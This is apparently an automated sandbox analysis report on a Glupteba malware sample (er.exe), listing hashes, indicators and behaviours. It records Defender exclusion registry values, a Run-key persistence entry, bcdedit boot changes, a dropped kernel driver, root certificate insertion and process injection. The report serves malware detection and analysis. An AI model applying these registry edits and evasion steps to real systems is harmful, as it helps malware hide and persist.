Analysis
max time kernel: 150s
max time network: 152s
platform: windows7_x64
resource: win7v20201028
submitted: 04-03-2021 21:00
Static task: static1
Behavioral task: behavioral1 (Sample: er.exe, Resource: win7v20201028)
Behavioral task: behavioral2 (Sample: er.exe, Resource: win10v20201028)
General
Target: er.exe
Size: 4.0MB
MD5: 160dd398272fd4fdf51f410adad9a51b
SHA1: f49489e7960978dd7dbb1784b0c67b1fd540926d
SHA256: 2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e
SHA512: 8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4
Malware Config
Extracted: metasploit (windows/single_exec)
Signatures
-
Glupteba Payload 4 IoCs
Processes (resource / yara_rule):
behavioral1/memory/1648-6-0x0000000000400000-0x0000000000C77000-memory.dmp  family_glupteba
behavioral1/memory/1648-7-0x0000000004E80000-0x00000000056DD000-memory.dmp  family_glupteba
behavioral1/memory/1648-8-0x0000000000400000-0x0000000000C77000-memory.dmp  family_glupteba
behavioral1/memory/1584-24-0x0000000000400000-0x0000000000C77000-memory.dmp  family_glupteba
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies boot configuration data using bcdedit 14 IoCs
Processes (pid / process):
816 bcdedit.exe
1248 bcdedit.exe
796 bcdedit.exe
680 bcdedit.exe
328 bcdedit.exe
604 bcdedit.exe
1212 bcdedit.exe
1492 bcdedit.exe
1344 bcdedit.exe
828 bcdedit.exe
1056 bcdedit.exe
1500 bcdedit.exe
1140 bcdedit.exe
796 bcdedit.exe
-
Blocklisted process makes network request 2 IoCs
Processes (flow / pid / process):
7  1164 rundll32.exe
9  1164 rundll32.exe
-
Drops file in Drivers directory 1 IoCs
Processes (description / ioc / process):
File created  C:\Windows\system32\drivers\Winmon.sys  csrss.exe
-
Executes dropped EXE 15 IoCs
Processes (pid / process):
1584 csrss.exe
1520 patch.exe
528 dsefix.exe
628 windefender.exe
1808 windefender.exe
904 ww31.exe
2020 updateprofile-15.exe
1900 u20200626.exe
1488 updateprofile-15.exe
796 u20200626.exe
1588 getfp.exe
2088 getfp.exe
2120 mg20201223-1.exe
2220 ml20201223.exe
2328 m672.exe
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Processes (resource / yara_rule):
C:\Windows\windefender.exe  upx
behavioral1/memory/628-62-0x0000000000400000-0x0000000000897000-memory.dmp  upx
C:\Windows\windefender.exe  upx
C:\Windows\windefender.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe  upx
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe  upx
behavioral1/memory/2020-85-0x0000000000400000-0x0000000000C1C000-memory.dmp  upx
behavioral1/memory/1900-86-0x0000000000400000-0x0000000000C1B000-memory.dmp  upx
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe  upx
behavioral1/memory/1488-92-0x0000000000400000-0x0000000000C1C000-memory.dmp  upx
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\getfp.exe  upx
behavioral1/memory/796-95-0x0000000000400000-0x0000000000C1B000-memory.dmp  upx
\Users\Admin\AppData\Local\Temp\csrss\getfp.exe  upx
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe  upx
behavioral1/memory/1588-99-0x0000000000400000-0x00000000005E6000-memory.dmp  upx
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe  upx
\Users\Admin\AppData\Local\Temp\csrss\m672.exe  upx
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe  upx
-
Loads dropped DLL 30 IoCs
Processes (pid / process):
692 er.exe
692 er.exe
880 (process name not recorded)
1520 patch.exe
1520 patch.exe
1520 patch.exe
1520 patch.exe
1520 patch.exe
1520 patch.exe
1520 patch.exe
1520 patch.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
2020 updateprofile-15.exe
2020 updateprofile-15.exe
2020 updateprofile-15.exe
1488 updateprofile-15.exe
1488 updateprofile-15.exe
1488 updateprofile-15.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
1584 csrss.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification
Processes (description / ioc / process):
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\er.exe = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\SummerWater = "0"  er.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"  er.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes (description / ioc / process):
Set value (str)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\SummerWater = "\"C:\\Windows\\rss\\csrss.exe\""  er.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
Processes (description / ioc / process):
File created  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\GameExplorer\{5DB02BE4-C29A-4813-9595-67091087F048}\PlayTasks\0\Play.lnk  rundll32.exe
-
Drops file in Windows directory 4 IoCs
Processes (description / ioc / process):
File created  C:\Windows\windefender.exe  csrss.exe
File opened for modification  C:\Windows\windefender.exe  csrss.exe
File opened for modification  C:\Windows\rss  er.exe
File created  C:\Windows\rss\csrss.exe  er.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 6 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes (description / flow / ioc):
HTTP User-Agent header  37  Go-http-client/1.1
HTTP User-Agent header  38  Go-http-client/1.1
HTTP User-Agent header  31  Go-http-client/1.1
HTTP User-Agent header  32  Go-http-client/1.1
HTTP User-Agent header  33  Go-http-client/1.1
HTTP User-Agent header  35  Go-http-client/1.1
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
windefender.exeer.execsrss.exenetsh.exerundll32.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" er.exe Set value (str) 
\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" er.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" er.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo 
Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-492 = "India Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. 
Australia Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" er.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" er.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\Software\Microsoft rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" er.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local 
Settings\MuiCache\25\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-331 = "E. 
Europe Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" windefender.exe -
Modifies registry class 3 IoCs
Processes (description / ioc / process):
Key created  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\ServiceLocation  rundll32.exe
Key created  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX  rundll32.exe
Set value (int)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\OOBGameInstalled = "1"  rundll32.exe
-
Modifies system certificate store
Processes:
csrss.exepatch.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 
040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa
2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb0
5f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes (pid / process):
1648 er.exe
692 er.exe
1584 csrss.exe
1584 csrss.exe
908 chrome.exe
908 chrome.exe
2192 chrome.exe
2192 chrome.exe
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes (pid / process):
476 (process name not recorded)
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes (description / pid / process):
Token: SeDebugPrivilege  1648 er.exe
Token: SeImpersonatePrivilege  1648 er.exe
Token: SeSystemEnvironmentPrivilege  1584 csrss.exe
Token: SeSecurityPrivilege  1724 sc.exe
Token: SeSecurityPrivilege  1724 sc.exe
Token: SeRestorePrivilege  1488 updateprofile-15.exe
Token: SeBackupPrivilege  1488 updateprofile-15.exe
-
Suspicious use of FindShellTrayWindow 3 IoCs
Processes (pid / process):
2192 chrome.exe
2192 chrome.exe
2192 chrome.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (description / pid / process / target process):
PID 1648 wrote to memory of 1164  1648 er.exe  rundll32.exe
PID 1648 wrote to memory of 1164  1648 er.exe  rundll32.exe
PID 1648 wrote to memory of 1164  1648 er.exe  rundll32.exe
PID 1648 wrote to memory of 1164  1648 er.exe  rundll32.exe
PID 1648 wrote to memory of 1164  1648 er.exe  rundll32.exe
PID 1648 wrote to memory of 1164  1648 er.exe  rundll32.exe
PID 1648 wrote to memory of 1164  1648 er.exe  rundll32.exe
PID 692 wrote to memory of 952  692 er.exe  rundll32.exe
PID 692 wrote to memory of 952  692 er.exe  rundll32.exe
PID 692 wrote to memory of 952  692 er.exe  rundll32.exe
PID 692 wrote to memory of 952  692 er.exe  rundll32.exe
PID 692 wrote to memory of 952  692 er.exe  rundll32.exe
PID 692 wrote to memory of 952  692 er.exe  rundll32.exe
PID 692 wrote to memory of 952  692 er.exe  rundll32.exe
PID 692 wrote to memory of 1568  692 er.exe  cmd.exe
PID 692 wrote to memory of 1568  692 er.exe  cmd.exe
PID 692 wrote to memory of 1568  692 er.exe  cmd.exe
PID 692 wrote to memory of 1568  692 er.exe  cmd.exe
PID 1568 wrote to memory of 2024  1568 cmd.exe  netsh.exe
PID 1568 wrote to memory of 2024  1568 cmd.exe  netsh.exe
PID 1568 wrote to memory of 2024  1568 cmd.exe  netsh.exe
PID 692 wrote to memory of 1584  692 er.exe  csrss.exe
PID 692 wrote to memory of 1584  692 er.exe  csrss.exe
PID 692 wrote to memory of 1584  692 er.exe  csrss.exe
PID 692 wrote to memory of 1584  692 er.exe  csrss.exe
PID 1520 wrote to memory of 816  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 816  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 816  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1248  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1248  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 1248  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 796  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 796  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 796  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 680  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 680  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 680  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 328  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 328  1520 patch.exe  bcdedit.exe
PID 1520 wrote to memory of 328  1520 patch.exe  bcdedit.exe
